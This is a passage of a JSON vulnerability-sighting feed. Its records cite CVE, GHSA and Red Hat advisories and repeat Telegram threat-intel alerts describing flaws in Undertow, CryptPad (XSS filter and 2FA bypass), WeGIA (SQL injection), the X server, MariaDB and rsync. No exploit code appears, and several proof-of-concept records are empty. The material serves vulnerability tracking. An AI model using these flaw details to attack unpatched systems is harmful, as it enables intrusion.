https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:5143\n3. https://access.redhat.com/errata/RHSA-2024:5144\n4. https://access.redhat.com/errata/RHSA-2024:5145\n5. https://access.redhat.com/errata/RHSA-2024:5147\n6. https://access.redhat.com/errata/RHSA-2024:6437\n7. https://access.redhat.com/security/cve/CVE-2024-3653\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2274437", "creation_timestamp": "2025-06-18T19:39:59.000000Z"}, {"uuid": "4b333bb1-a6a1-40d1-a422-630ab72f1593", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6437", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18810", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3653\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This issue requires enabling the learning-push handler in the server's config, which is disabled by default, leaving the maxAge config in the handler unconfigured. The default is -1, which makes the handler vulnerable. If someone overwrites that config, the server is not subject to the attack. The attacker needs to be able to reach the server with a normal HTTP request.\n\ud83d\udccf Published: 2024-07-08T21:21:20.899Z\n\ud83d\udccf Modified: 2025-06-18T18:51:22.323Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:5143\n3. https://access.redhat.com/errata/RHSA-2024:5144\n4. https://access.redhat.com/errata/RHSA-2024:5145\n5. https://access.redhat.com/errata/RHSA-2024:5147\n6. https://access.redhat.com/errata/RHSA-2024:6437\n7. https://access.redhat.com/security/cve/CVE-2024-3653\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2274437", "creation_timestamp": "2025-06-18T19:39:59.000000Z"}, {"uuid": "d53a3ce9-5572-466f-926c-ea9ddcaf81f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5147", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18810", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3653\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This issue requires enabling the learning-push handler in the server's config, which is disabled by default, leaving the maxAge config in the handler unconfigured. The default is -1, which makes the handler vulnerable. If someone overwrites that config, the server is not subject to the attack. The attacker needs to be able to reach the server with a normal HTTP request.\n\ud83d\udccf Published: 2024-07-08T21:21:20.899Z\n\ud83d\udccf Modified: 2025-06-18T18:51:22.323Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:5143\n3. https://access.redhat.com/errata/RHSA-2024:5144\n4. https://access.redhat.com/errata/RHSA-2024:5145\n5. https://access.redhat.com/errata/RHSA-2024:5147\n6. https://access.redhat.com/errata/RHSA-2024:6437\n7. https://access.redhat.com/security/cve/CVE-2024-3653\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2274437", "creation_timestamp": "2025-06-18T19:39:59.000000Z"}, {"uuid": "8ecf5333-6025-4f0a-81ef-30cdb3b96de7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4392", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18810", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3653\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This issue requires enabling the learning-push handler in the server's config, which is disabled by default, leaving the maxAge config in the handler unconfigured. The default is -1, which makes the handler vulnerable. If someone overwrites that config, the server is not subject to the attack. The attacker needs to be able to reach the server with a normal HTTP request.\n\ud83d\udccf Published: 2024-07-08T21:21:20.899Z\n\ud83d\udccf Modified: 2025-06-18T18:51:22.323Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:5143\n3. https://access.redhat.com/errata/RHSA-2024:5144\n4. https://access.redhat.com/errata/RHSA-2024:5145\n5. https://access.redhat.com/errata/RHSA-2024:5147\n6. https://access.redhat.com/errata/RHSA-2024:6437\n7. https://access.redhat.com/security/cve/CVE-2024-3653\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2274437", "creation_timestamp": "2025-06-18T19:39:59.000000Z"}, {"uuid": "7d522e18-9c04-4531-8211-1ac0f7f5de8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5144", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18810", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3653\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This issue requires enabling the learning-push handler in the server's config, which is disabled by default, leaving the maxAge config in the handler unconfigured. The default is -1, which makes the handler vulnerable. If someone overwrites that config, the server is not subject to the attack. The attacker needs to be able to reach the server with a normal HTTP request.\n\ud83d\udccf Published: 2024-07-08T21:21:20.899Z\n\ud83d\udccf Modified: 2025-06-18T18:51:22.323Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:5143\n3. https://access.redhat.com/errata/RHSA-2024:5144\n4. https://access.redhat.com/errata/RHSA-2024:5145\n5. https://access.redhat.com/errata/RHSA-2024:5147\n6. https://access.redhat.com/errata/RHSA-2024:6437\n7. https://access.redhat.com/security/cve/CVE-2024-3653\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2274437", "creation_timestamp": "2025-06-18T19:39:59.000000Z"}, {"uuid": "42641c3b-d851-45d4-899d-1d6594e5e102", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HV4R-MVR4-25VW", "type": "published-proof-of-concept", "source": "Telegram/NIz4Hq2d69t6fRYm4ZcrXWZIskbJKFNbLYHbUSSyCcR9Mzg", "content": "", "creation_timestamp": "2026-04-22T03:15:49.000000Z"}, {"uuid": "14f888de-dcba-485c-a26d-ca1d61354412", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9C4Q-HQ6P-C237", "type": "published-proof-of-concept", "source": "Telegram/NIz4Hq2d69t6fRYm4ZcrXWZIskbJKFNbLYHbUSSyCcR9Mzg", "content": "", "creation_timestamp": "2026-04-22T03:15:49.000000Z"}, {"uuid": "df3a5a7a-b2cb-420b-b398-30156566f349", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2X79-GWQ3-VXXM", "type": "published-proof-of-concept", "source": "Telegram/NIz4Hq2d69t6fRYm4ZcrXWZIskbJKFNbLYHbUSSyCcR9Mzg", "content": "", "creation_timestamp": "2026-04-22T03:15:49.000000Z"}, {"uuid": "8250bd71-af82-4e17-9cb9-cf745b54e60b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VQ9H-X3GR-V8RJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18815", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49590\n\ud83d\udd25 CVSS Score: 2.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N/E:P)\n\ud83d\udd39 Description: CryptPad is a collaboration suite. Prior to version 2025.3.0, the \"Link Bouncer\" functionality attempts to filter javascript URIs to prevent Cross-Site Scripting (XSS), however this can be bypassed. There is an \"early allow\" code path that happens before the URI's protocol/scheme is checked, which a maliciously crafted URI can follow. This issue has been patched in version 2025.3.0.\n\ud83d\udccf Published: 2025-06-18T22:14:06.323Z\n\ud83d\udccf Modified: 2025-06-18T22:14:06.323Z\n\ud83d\udd17 References:\n1. https://github.com/cryptpad/cryptpad/security/advisories/GHSA-vq9h-x3gr-v8rj\n2. https://github.com/cryptpad/cryptpad/commit/d5e4830ba104a4a442cb23aab5378b8565a95607\n3. https://github.com/cryptpad/cryptpad/blob/15c81aa8ccb737a9a1167481f4a699af331364bb/www/bounce/main.js#L64-L95", "creation_timestamp": "2025-06-18T22:41:04.000000Z"}, {"uuid": "95f85a92-2463-4d90-a88d-8b996a978be4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-48P4-8XCF-VXJ5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18833", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-50182\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: urllib3 is a user-friendly HTTP client library for Python. Prior to 2.5.0, urllib3 does not control redirects in browsers and Node.js. urllib3 supports being used in a Pyodide runtime utilizing the JavaScript Fetch API or falling back on XMLHttpRequest. This means Python libraries can be used to make HTTP requests from a browser or Node.js. Additionally, urllib3 provides a mechanism to control redirects, but the retries and redirect parameters are ignored with Pyodide; the runtime itself determines redirect behavior. This issue has been patched in version 2.5.0.\n\ud83d\udccf Published: 2025-06-19T01:42:44.921Z\n\ud83d\udccf Modified: 2025-06-19T01:42:44.921Z\n\ud83d\udd17 References:\n1. https://github.com/urllib3/urllib3/security/advisories/GHSA-48p4-8xcf-vxj5\n2. https://github.com/urllib3/urllib3/commit/7eb4a2aafe49a279c29b6d1f0ed0f42e9736194f", "creation_timestamp": "2025-06-19T02:40:18.000000Z"}, {"uuid": "45334d19-32cd-4977-8258-d1ce8c1f79f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RWVH-2GFH-WMCM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18836", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52474\n\ud83d\udd25 CVSS Score: 8.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N)\n\ud83d\udd39 Description: WeGIA is a web manager for charitable institutions. Prior to version 3.4.2, a SQL Injection vulnerability was identified in the id parameter of the /WeGIA/controle/control.php endpoint. This vulnerability allows attacker to manipulate SQL queries and access sensitive database information, such as table names and sensitive data. This issue has been patched in version 3.4.2.\n\ud83d\udccf Published: 2025-06-19T03:40:47.301Z\n\ud83d\udccf Modified: 2025-06-19T03:40:47.301Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rwvh-2gfh-wmcm\n2. https://github.com/LabRedesCefetRJ/WeGIA/commit/b6fbb3e21b8d71e50afe0395dca44acdd1ca2e29", "creation_timestamp": "2025-06-19T04:41:27.000000Z"}, {"uuid": "3b7fd3c0-cad4-4943-97b9-8a093a12ddeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9306", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19184", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49176\n\ud83d\udd25 CVSS Score: 6.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: A flaw was found in the Big Requests extension. The request length is multiplied by 4 before checking against the maximum allowed size, potentially causing an integer overflow and bypassing the size check.\n\ud83d\udccf Published: 2025-06-17T14:49:49.143Z\n\ud83d\udccf Modified: 2025-06-23T06:33:35.083Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9303\n2. https://access.redhat.com/errata/RHSA-2025:9304\n3. https://access.redhat.com/errata/RHSA-2025:9305\n4. https://access.redhat.com/errata/RHSA-2025:9306\n5. https://access.redhat.com/security/cve/CVE-2025-49176\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2369954", "creation_timestamp": "2025-06-23T06:45:54.000000Z"}, {"uuid": "0a910964-2b0b-4861-9df0-1a55396e1ca9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9306", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19181", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49180\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the RandR extension, where the RRChangeProviderProperty function does not properly validate input. This issue leads to an integer overflow when computing the total size to allocate.\n\ud83d\udccf Published: 2025-06-17T15:00:18.145Z\n\ud83d\udccf Modified: 2025-06-23T06:34:54.352Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9303\n2. https://access.redhat.com/errata/RHSA-2025:9304\n3. https://access.redhat.com/errata/RHSA-2025:9305\n4. https://access.redhat.com/errata/RHSA-2025:9306\n5. https://access.redhat.com/security/cve/CVE-2025-49180\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2369981", "creation_timestamp": "2025-06-23T06:45:50.000000Z"}, {"uuid": "3e3e1ca6-21ea-40e7-8803-814df6c0f21d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9303", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19181", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49180\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the RandR extension, where the RRChangeProviderProperty function does not properly validate input. This issue leads to an integer overflow when computing the total size to allocate.\n\ud83d\udccf Published: 2025-06-17T15:00:18.145Z\n\ud83d\udccf Modified: 2025-06-23T06:34:54.352Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9303\n2. https://access.redhat.com/errata/RHSA-2025:9304\n3. https://access.redhat.com/errata/RHSA-2025:9305\n4. https://access.redhat.com/errata/RHSA-2025:9306\n5. https://access.redhat.com/security/cve/CVE-2025-49180\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2369981", "creation_timestamp": "2025-06-23T06:45:50.000000Z"}, {"uuid": "e3892b00-7627-4fa4-a9e0-a75c5d972316", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9305", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19181", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49180\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the RandR extension, where the RRChangeProviderProperty function does not properly validate input. This issue leads to an integer overflow when computing the total size to allocate.\n\ud83d\udccf Published: 2025-06-17T15:00:18.145Z\n\ud83d\udccf Modified: 2025-06-23T06:34:54.352Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9303\n2. https://access.redhat.com/errata/RHSA-2025:9304\n3. https://access.redhat.com/errata/RHSA-2025:9305\n4. https://access.redhat.com/errata/RHSA-2025:9306\n5. https://access.redhat.com/security/cve/CVE-2025-49180\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2369981", "creation_timestamp": "2025-06-23T06:45:50.000000Z"}, {"uuid": "20d7c7a7-2cb0-42be-b83a-cb448f1362a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PM7Q-RJJX-979P", "type": "seen", "source": "Telegram/CTUi-siovRZPMXoRCribr6B1ZCHTTpPI8Ha33jZ7j7d94jM", "content": "", "creation_timestamp": "2026-04-21T23:30:54.000000Z"}, {"uuid": "6e379589-c539-472c-b487-acbb57c7e01f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7X63-XV5R-3P2X", "type": "seen", "source": "Telegram/LUR06ONloRlViUIW27ojzHZG9BE33b4Dag-_8VffcgXgN_8", "content": "", "creation_timestamp": "2026-04-22T01:19:23.000000Z"}, {"uuid": "7b01e0c9-6916-44d5-b73a-8f775d929ce9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FF5Q-CC22-FGP4", "type": "published-proof-of-concept", "source": "Telegram/A_sK9uQCoE0LPzwbkNe8abRZIpz_VzCCIAKmN05DDH2W6pw", "content": "", "creation_timestamp": "2026-04-22T01:18:49.000000Z"}, {"uuid": "d4bf232c-bf3d-4caf-ac02-9906a72d8b39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5879-4FMR-XWF2", "type": "published-proof-of-concept", "source": "Telegram/A_sK9uQCoE0LPzwbkNe8abRZIpz_VzCCIAKmN05DDH2W6pw", "content": "", "creation_timestamp": "2026-04-22T01:18:49.000000Z"}, {"uuid": "17bfc5d9-c0b3-4b1b-ba72-c32c1630df21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XQ5X-WGCM-3P33", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18814", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49591\n\ud83d\udd25 CVSS Score: 7.4 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: CryptPad is a collaboration suite. Prior to version 2025.3.0, enforcement of Two-Factor Authentication (2FA) in CryptPad can be trivially bypassed, due to weak implementation of access controls. An attacker that compromises a user's credentials can gain access to the victim's account, even if the victim has 2FA set up. This is due to 2FA not being enforced if the path parameter is not 44 characters long, which can be bypassed by simply URL encoding a single character in the path. This issue has been patched in version 2025.3.0.\n\ud83d\udccf Published: 2025-06-18T22:15:16.890Z\n\ud83d\udccf Modified: 2025-06-18T22:15:16.890Z\n\ud83d\udd17 References:\n1. https://github.com/cryptpad/cryptpad/security/advisories/GHSA-xq5x-wgcm-3p33\n2. https://github.com/cryptpad/cryptpad/commit/0c5d4bbf5e5206d53470ea86a664fa2b703fb611\n3. https://github.com/cryptpad/cryptpad/commit/f624f9d457d36040f57c7598d98a8b9461b79837\n4. https://github.com/cryptpad/cryptpad/blob/15c81aa8ccb737a9a1167481f4a699af331364bb/lib/http-worker.js#L356-L364", "creation_timestamp": "2025-06-18T22:41:02.000000Z"}, {"uuid": "b4f1c273-d729-464d-a552-024cf11e6e43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FFW8-FWXP-H64W", "type": "published-proof-of-concept", "source": "Telegram/A_sK9uQCoE0LPzwbkNe8abRZIpz_VzCCIAKmN05DDH2W6pw", "content": "", "creation_timestamp": "2026-04-22T01:18:49.000000Z"}, {"uuid": "1451efc1-01f2-4a9a-8c21-e4f109f6a7e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XMJM-86QV-G226", "type": "published-proof-of-concept", "source": "Telegram/A_sK9uQCoE0LPzwbkNe8abRZIpz_VzCCIAKmN05DDH2W6pw", "content": "", "creation_timestamp": "2026-04-22T01:18:49.000000Z"}, {"uuid": "084838aa-1e53-4d33-9c7a-0a8cbcc2bf93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CCQ9-R5CW-5HWQ", "type": "published-proof-of-concept", "source": "Telegram/A_sK9uQCoE0LPzwbkNe8abRZIpz_VzCCIAKmN05DDH2W6pw", "content": "", "creation_timestamp": "2026-04-22T01:18:49.000000Z"}, {"uuid": "348d0963-1d8d-47f8-8509-18c577ba6622", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9X67-F2V7-63RW", "type": "published-proof-of-concept", "source": "Telegram/A_sK9uQCoE0LPzwbkNe8abRZIpz_VzCCIAKmN05DDH2W6pw", "content": "", "creation_timestamp": "2026-04-22T01:18:49.000000Z"}, {"uuid": "3523a9e4-dc3b-4741-bd72-1370e1725c94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-793Q-XGJ6-7FRP", "type": "published-proof-of-concept", "source": "Telegram/A_sK9uQCoE0LPzwbkNe8abRZIpz_VzCCIAKmN05DDH2W6pw", "content": "", "creation_timestamp": "2026-04-22T01:18:49.000000Z"}, {"uuid": "7fe0d9d2-633e-43fc-8213-5b69382e4916", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:6821", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18754", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-5157\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in MariaDB. An OpenVAS port scan on ports 3306 and 4567 allows a malicious remote client to cause a denial of service.\n\ud83d\udccf Published: 2023-09-26T13:25:24.082Z\n\ud83d\udccf Modified: 2025-06-18T14:15:05.632Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:5683\n2. https://access.redhat.com/errata/RHSA-2023:5684\n3. https://access.redhat.com/errata/RHSA-2023:6821\n4. https://access.redhat.com/errata/RHSA-2023:6822\n5. https://access.redhat.com/errata/RHSA-2023:6883\n6. https://access.redhat.com/errata/RHSA-2023:7633\n7. https://access.redhat.com/security/cve/CVE-2023-5157\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2240246", "creation_timestamp": "2025-06-18T14:41:57.000000Z"}, {"uuid": "203857db-b61e-4825-b334-c017a4fe2378", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7633", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18754", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-5157\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in MariaDB. An OpenVAS port scan on ports 3306 and 4567 allows a malicious remote client to cause a denial of service.\n\ud83d\udccf Published: 2023-09-26T13:25:24.082Z\n\ud83d\udccf Modified: 2025-06-18T14:15:05.632Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:5683\n2. https://access.redhat.com/errata/RHSA-2023:5684\n3. https://access.redhat.com/errata/RHSA-2023:6821\n4. https://access.redhat.com/errata/RHSA-2023:6822\n5. https://access.redhat.com/errata/RHSA-2023:6883\n6. https://access.redhat.com/errata/RHSA-2023:7633\n7. https://access.redhat.com/security/cve/CVE-2023-5157\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2240246", "creation_timestamp": "2025-06-18T14:41:57.000000Z"}, {"uuid": "0db069e1-f927-42c5-baca-1244a4b5154c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J432-4W3J-3W8J", "type": "seen", "source": "Telegram/zBPsvp7areyPvO2SEeKM1Qy-KxN79fyHXtde1OrDiJAWALw", "content": "", "creation_timestamp": "2026-04-22T01:19:03.000000Z"}, {"uuid": "714dddee-41d5-4160-9eb8-43196ebf2dfb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:5684", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18754", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-5157\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in MariaDB. An OpenVAS port scan on ports 3306 and 4567 allows a malicious remote client to cause a denial of service.\n\ud83d\udccf Published: 2023-09-26T13:25:24.082Z\n\ud83d\udccf Modified: 2025-06-18T14:15:05.632Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:5683\n2. https://access.redhat.com/errata/RHSA-2023:5684\n3. https://access.redhat.com/errata/RHSA-2023:6821\n4. https://access.redhat.com/errata/RHSA-2023:6822\n5. https://access.redhat.com/errata/RHSA-2023:6883\n6. https://access.redhat.com/errata/RHSA-2023:7633\n7. https://access.redhat.com/security/cve/CVE-2023-5157\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2240246", "creation_timestamp": "2025-06-18T14:41:57.000000Z"}, {"uuid": "850148d3-3584-40fd-8dee-0ee6f409aedc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7050", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18777", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12088\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync. When using the `--safe-links` option, the rsync client fails to properly verify if a symbolic link destination sent from the server contains another symbolic link within it. This results in a path traversal vulnerability, which may lead to arbitrary file write outside the desired directory.\n\ud83d\udccf Published: 2025-01-14T17:38:34.890Z\n\ud83d\udccf Modified: 2025-06-18T16:34:57.892Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2600\n2. https://access.redhat.com/errata/RHSA-2025:7050\n3. https://access.redhat.com/errata/RHSA-2025:8385\n4. https://access.redhat.com/security/cve/CVE-2024-12088\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2330676\n6. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-06-18T16:43:22.000000Z"}, {"uuid": "7e4c5fbe-1245-432e-83e3-f66f88654559", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 